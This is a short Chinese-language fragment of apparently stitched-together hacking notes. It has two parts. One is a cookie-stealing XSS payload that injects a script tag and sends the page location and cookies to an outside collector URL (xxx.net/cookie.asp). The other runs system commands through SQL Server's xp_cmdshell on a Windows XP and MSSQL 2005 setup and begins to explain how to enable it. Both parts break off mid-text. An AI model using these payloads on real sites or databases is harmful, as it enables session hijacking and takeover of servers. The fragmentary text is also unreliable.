偷取Cookie,通过以下脚本引入一个js,document.write(script src=XX.js/script),然后js内容为:
var code;
var target = http://www.xxx.net/cookie.asp?;
info=escape(document.location+@@ ...……
测试环境:windows xp pro sp2 + mssql 2005(服务以system权限启动)
一.xp_cmdshell
EXEC master..xp_cmdshell ipconfig
开启xp_cmdshell:
To allow advanced options to be changed.
...……